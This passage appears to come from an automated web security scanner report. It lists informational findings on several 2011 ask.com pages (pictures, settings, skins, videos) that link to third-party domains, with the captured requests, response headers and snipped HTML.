The page was loaded from a URL containing a query string:

http://www.ask.com/pictures?qsrc=167&o=0&l=dir&q=regulator+boat&v=14

The response contains the following links to other domains:

http://api.recaptcha.net/js/recaptcha_ajax.js
http://ask.pronto.com/user/search.do?&q=regulator+boat
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.askkids.com/?o=0&l=dir
http://www.google.com/aclk?sa=L&ai=CDDLAXstBTb74FYa7gwfz84nWDqP5irIBr_eu0xTIo6UeEAIgifaQAigCUK_auzFgyYajh9SjgBDIAQGqBBlP0Bhdguaaw8O5VOlhI_pbjm-1rFblHu3l&num=2&sig=AGiWqtwc6XpV5Q93ubCn14UFx2z3_rxH9A&adurl=http://www.shopping.com/regulator%2520boat/products~NS-1~linkin_id-8011124~cid-5448976519
http://www.google.com/aclk?sa=L&ai=Cv6q-XstBTb74FYa7gwfz84nWDsKiyt4BktqohBaM05gsEAEgifaQAigCUJ7OkMr8_____wFgyYajh9SjgBDIAQGqBBxP0BhdguaZw8K5VLYRMeFbjm-1rFblHu3l9pI4&num=1&sig=AGiWqtxYv_BGkyRCSX4Wi9R2zJPC3Axnpg&adurl=http://geo.peeplo.com/peeplo/search/%3Fq%3Dregulator%2520boats%26type%3Dweb%26from%3Dadgsp5

Request

GET /pictures?qsrc=167&o=0&l=dir&q=regulator+boat&v=14 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 27 Jan 2011 19:45:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:45:34 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ1OjM0LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:34 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:34 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 120247

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>

...[SNIP]...
<li><a href="http://ask.pronto.com/user/search.do?&q=regulator+boat"
class="txt3 b" style="">Shopping</a>
...[SNIP]...
<li>
<a href="http://www.askkids.com?o=0&l=dir"
class="txt3 b" style="">Kids</a>
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=Cv6q-XstBTb74FYa7gwfz84nWDsKiyt4BktqohBaM05gsEAEgifaQAigCUJ7OkMr8_____wFgyYajh9SjgBDIAQGqBBxP0BhdguaZw8K5VLYRMeFbjm-1rFblHu3l9pI4&num=1&sig=AGiWqtxYv_BGkyRCSX4Wi9R2zJPC3Axnpg&adurl=http://geo.peeplo.com/peeplo/search/%3Fq%3Dregulator%2520boats%26type%3Dweb%26from%3Dadgsp5" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(23); if (typeof efclk != 'undefined') efclk(23); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'top',ec:'2',ex:'sgcl%3Ddb252C-zMSxrAK%26sgch%3D64cclxnysy'},'gg_0');" class="nu" onmouseover="return ss('peeplo.com/<b>Regulator+Boat</b>s')" onmouseout="cs()" style="display:block;padding:15px 20px 10px 15px;">

...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CDDLAXstBTb74FYa7gwfz84nWDqP5irIBr_eu0xTIo6UeEAIgifaQAigCUK_auzFgyYajh9SjgBDIAQGqBBlP0Bhdguaaw8O5VOlhI_pbjm-1rFblHu3l&num=2&sig=AGiWqtwc6XpV5Q93ubCn14UFx2z3_rxH9A&adurl=http://www.shopping.com/regulator%2520boat/products~NS-1~linkin_id-8011124~cid-5448976519" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(94); if (typeof efclk != 'undefined') efclk(94); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'2',ex:'sgcl%3Ddb252C-zMSxrAK%26sgch%3D64cclxnysy'},'gg_1');" class="nu" onmouseover="return ss('www.shopping.com')" onmouseout="cs()" style="display:block;padding:0px 20px 15px 15px;">

...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=Cv6q-XstBTb74FYa7gwfz84nWDsKiyt4BktqohBaM05gsEAEgifaQAigCUJ7OkMr8_____wFgyYajh9SjgBDIAQGqBBxP0BhdguaZw8K5VLYRMeFbjm-1rFblHu3l9pI4&num=1&sig=AGiWqtxYv_BGkyRCSX4Wi9R2zJPC3Axnpg&adurl=http://geo.peeplo.com/peeplo/search/%3Fq%3Dregulator%2520boats%26type%3Dweb%26from%3Dadgsp5" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(37); if (typeof efclk != 'undefined') efclk(37); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'bot',ec:'2',ex:'sgcl%3Ddb252C-zMSxrAK%26sgch%3D64cclxnysy'},'gg_0');" class="nu" onmouseover="return ss('peeplo.com/<b>Regulator+Boat</b>s')" onmouseout="cs()" style="display:block;padding:15px 20px 10px 15px;">

...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CDDLAXstBTb74FYa7gwfz84nWDqP5irIBr_eu0xTIo6UeEAIgifaQAigCUK_auzFgyYajh9SjgBDIAQGqBBlP0Bhdguaaw8O5VOlhI_pbjm-1rFblHu3l&num=2&sig=AGiWqtwc6XpV5Q93ubCn14UFx2z3_rxH9A&adurl=http://www.shopping.com/regulator%2520boat/products~NS-1~linkin_id-8011124~cid-5448976519" rel="nofollow" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(23); if (typeof efclk != 'undefined') efclk(23); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'bot',ec:'2',ex:'sgcl%3Ddb252C-zMSxrAK%26sgch%3D64cclxnysy'},'gg_1');" class="nu" onmouseover="return ss('www.shopping.com')" onmouseout="cs()" style="display:block;padding:0px 20px 15px 15px;">

...[SNIP]...
</script>
<script language="javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...

<a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>

<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...

12.16. http://www.ask.com/pictureslanding previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/pictureslanding

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/pictureslanding?o=0&l=dir

The response contains the following links to other domains:

http://66.235.120.67/e?t=10152186066765310018
http://66.235.120.67/e?t=10343133515434976928
http://66.235.120.67/e?t=12026207754337802815
http://66.235.120.67/e?t=12783632770436824847
http://66.235.120.67/e?t=13198021443737514979
http://66.235.120.67/e?t=14399646340691739923
http://66.235.120.67/e?t=18390628742734796969
http://66.235.120.67/e?t=282227329742125504
http://api.recaptcha.net/js/recaptcha_ajax.js
http://ask.pronto.com/user/search.do?&q=
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.askkids.com/?o=0&l=dir

Request

GET /pictureslanding?o=0&l=dir HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:13:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:12 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjEyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:12 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:12 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Set-Cookie: ldpt=porg=5488|0~5489|0~5490|1; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:12 GMT; Path=/
Content-Length: 67807

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>

<tit
...[SNIP]...
<li><a href="http://ask.pronto.com/user/search.do?&q="
class="txt3 b" style="">Shopping</a>
...[SNIP]...
<li>
<a href="http://www.askkids.com?o=0&l=dir"
class="txt3 b" style="">Kids</a>
...[SNIP]...
<div id="di0"><img id="image0" src="http://66.235.120.67:80/e?t=282227329742125504" border="0" hspace="0" vspace="0"
width="128"
height="128"/></div>
...[SNIP]...
<div id="di1"><img id="image1" src="http://66.235.120.67:80/e?t=12783632770436824847" border="0" hspace="0" vspace="0"
width="128"
height="128"/></div>
...[SNIP]...
<div id="di2"><img id="image2" src="http://66.235.120.67:80/e?t=18390628742734796969" border="0" hspace="0" vspace="0"
width="128"
height="128"/></div>
...[SNIP]...
<div id="di3"><img id="image3" src="http://66.235.120.67:80/e?t=10152186066765310018" border="0" hspace="0" vspace="0"
width="128"
height="128"/></div>
...[SNIP]...
<div id="di4"><img id="image4" src="http://66.235.120.67:80/e?t=14399646340691739923" border="0" hspace="0" vspace="0"
width="128"
height="128"/></div>
...[SNIP]...
<div id="di5"><img id="image5" src="http://66.235.120.67:80/e?t=12026207754337802815" border="0" hspace="0" vspace="0"
width="128"
height="128"/></div>
...[SNIP]...
<div id="di6"><img id="image6" src="http://66.235.120.67:80/e?t=10343133515434976928" border="0" hspace="0" vspace="0"
width="128"
height="128"/></div>
...[SNIP]...
<div id="di7"><img id="image7" src="http://66.235.120.67:80/e?t=13198021443737514979" border="0" hspace="0" vspace="0"
width="128"
height="128"/></div>
...[SNIP]...
</script>
<script language="javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script language="javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...

<a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>

<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...

12.17. http://www.ask.com/pictureslanding previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/pictureslanding

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/pictureslanding?o=0&l=dir

The response contains the following links to other domains:

http://66.235.120.67/e?t=10152186066765310018
http://66.235.120.67/e?t=10343133515434976928
http://66.235.120.67/e?t=11633786088686118540
http://66.235.120.67/e?t=12783632770436824847
http://66.235.120.67/e?t=13198021443737514979
http://66.235.120.67/e?t=14399646340691739923
http://66.235.120.67/e?t=1919601221500300000
http://66.235.120.67/e?t=7228049331730286572
http://66.235.120.67/e?t=8747129374967958627
http://api.recaptcha.net/js/recaptcha_ajax.js
http://ask.pronto.com/user/search.do?&q=
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.askkids.com/?o=0&l=dir

Request

GET /pictureslanding?o=0&l=dir HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:43:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:43:53 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQzOjUzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:43:53 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:43:53 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 69165

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>

<tit
...[SNIP]...
<li><a href="http://ask.pronto.com/user/search.do?&q="
class="txt3 b" style="">Shopping</a>
...[SNIP]...
<li>
<a href="http://www.askkids.com?o=0&l=dir"
class="txt3 b" style="">Kids</a>
...[SNIP]...
<div id="di0"><img id="image0" src="http://66.235.120.67:80/e?t=8747129374967958627" border="0" hspace="0" vspace="0"
width="128"
height="128"/></div>
...[SNIP]...
<div id="di1"><img id="image1" src="http://66.235.120.67:80/e?t=12783632770436824847" border="0" hspace="0" vspace="0"
width="128"
height="128"/></div>
...[SNIP]...
<div id="di2"><img id="image2" src="http://66.235.120.67:80/e?t=7228049331730286572" border="0" hspace="0" vspace="0"
width="128"
height="128"/></div>
...[SNIP]...
<div id="di3"><img id="image3" src="http://66.235.120.67:80/e?t=14399646340691739923" border="0" hspace="0" vspace="0"
width="128"
height="128"/></div>
...[SNIP]...
<div id="di4"><img id="image4" src="http://66.235.120.67:80/e?t=10152186066765310018" border="0" hspace="0" vspace="0"
width="128"
height="128"/></div>
...[SNIP]...
<div id="di5"><img id="image5" src="http://66.235.120.67:80/e?t=11633786088686118540" border="0" hspace="0" vspace="0"
width="128"
height="128"/></div>
...[SNIP]...
<div id="di6"><img id="image6" src="http://66.235.120.67:80/e?t=10343133515434976928" border="0" hspace="0" vspace="0"
width="128"
height="128"/></div>
...[SNIP]...
<div id="di7"><img id="image7" src="http://66.235.120.67:80/e?t=1919601221500300000" border="0" hspace="0" vspace="0"
width="128"
height="128"/></div>
...[SNIP]...
<div id="di8"><img id="image8" src="http://66.235.120.67:80/e?t=13198021443737514979" border="0" hspace="0" vspace="0"
width="128"
height="128"/></div>
...[SNIP]...
</script>
<script language="javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script language="javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...

<a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>

<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...

12.18. http://www.ask.com/settings previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/settings

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/settings?o=0&l=dir

The response contains the following links to other domains:

http://api.recaptcha.net/js/recaptcha_ajax.js
http://ask.pronto.com/user/search.do?&q=
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://www.askkids.com/?o=0&l=dir

Request

GET /settings?o=0&l=dir HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:44:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:44:18 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ0OjE4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:18 GMT; Path=/
Content-Length: 57013

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

...[SNIP]...
<li><a href="http://ask.pronto.com/user/search.do?&q="
class="txt3 b" style="">Shopping</a>
...[SNIP]...
<li>
<a href="http://www.askkids.com?o=0&l=dir"
class="txt3 b" style="">Kids</a>
...[SNIP]...

<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...

<a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>

<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...

12.19. http://www.ask.com/skins previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/skins

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/skins?o=0&l=dir

The response contains the following links to other domains:

http://asksupport.custhelp.com/app/answers/list
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh

Request

GET /skins?o=0&l=dir HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 27 Jan 2011 19:13:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:22 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjIyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:22 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:22 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 102418

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>
<head>
<tit
...[SNIP]...
</span>

<a id="ftCareers" href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" class="txt3">

Careers
</a>
...[SNIP]...
</span>

<a id="ftHelp" href="http://asksupport.custhelp.com/app/answers/list" class="txt3" target="_blank">

Help
</a>
...[SNIP]...

12.20. http://www.ask.com/videos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/videos

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/videos?qsrc=167&o=0&l=dir&q=regulator+boat

The response contains the following links to other domains:

http://api.recaptcha.net/js/recaptcha_ajax.js
http://ask.pronto.com/user/search.do?&q=regulator+boat
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://www.ask.blinkx.com/videos/regulator+boat?ver=14&host=US&referer=ask.com
http://www.askkids.com/?o=0&l=dir
http://www.google.com/aclk?sa=L&ai=CcKc2_spBTeudOoK8gwfIz-yTD6n3pJ4B5ZrwpxLfgdAFEAEg75WbESgFUNvdkej7_____wFgyYajh9SjgBDIAQGqBBZP0MqZdYof6fPyxFk09BafLdd2ys0z&num=1&sig=AGiWqtwx-TY2qbdmjiZTlRxCQZ1i3gWWlw&adurl=http://www.gatewaymarina.com/ship_store.html
http://www.google.com/aclk?sa=l&ai=C1_n1_spBTeudOoK8gwfIz-yTD-2R_78Br7bGshWQqMEHEAUg75WbESgFUIX6pcj8_____wFgyYajh9SjgBCgAafk0foDyAEBqQLk-rgrfNawPqoEH0_Q2thwihvp86vFOCL5x2pOscMprv2kbt3LaPKHv5I&num=5&sig=AGiWqtwtAcSl9XlDPKnVHACTiDHwOVsABw&adurl=http://www.BoaterExam.com/usa/DistrictOfColumbia/
http://www.google.com/aclk?sa=l&ai=CAgT6_spBTeudOoK8gwfIz-yTD9vO8tsBk7izyxfr17kIEAMg75WbESgFUOGQ56n-_____wFgyYajh9SjgBCgAbnSv_8DyAEBqgQcT9D6jXyKHenz48WmXGtpQpHNxCWwJxRqtZQRjg&num=3&ctype=4&sig=AGiWqtwEbxDvDbAVVP3IjQQQa68S0Xeuyw&adurl=http://www.rkdms.com/redirect%3Fc%3D184789441%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats
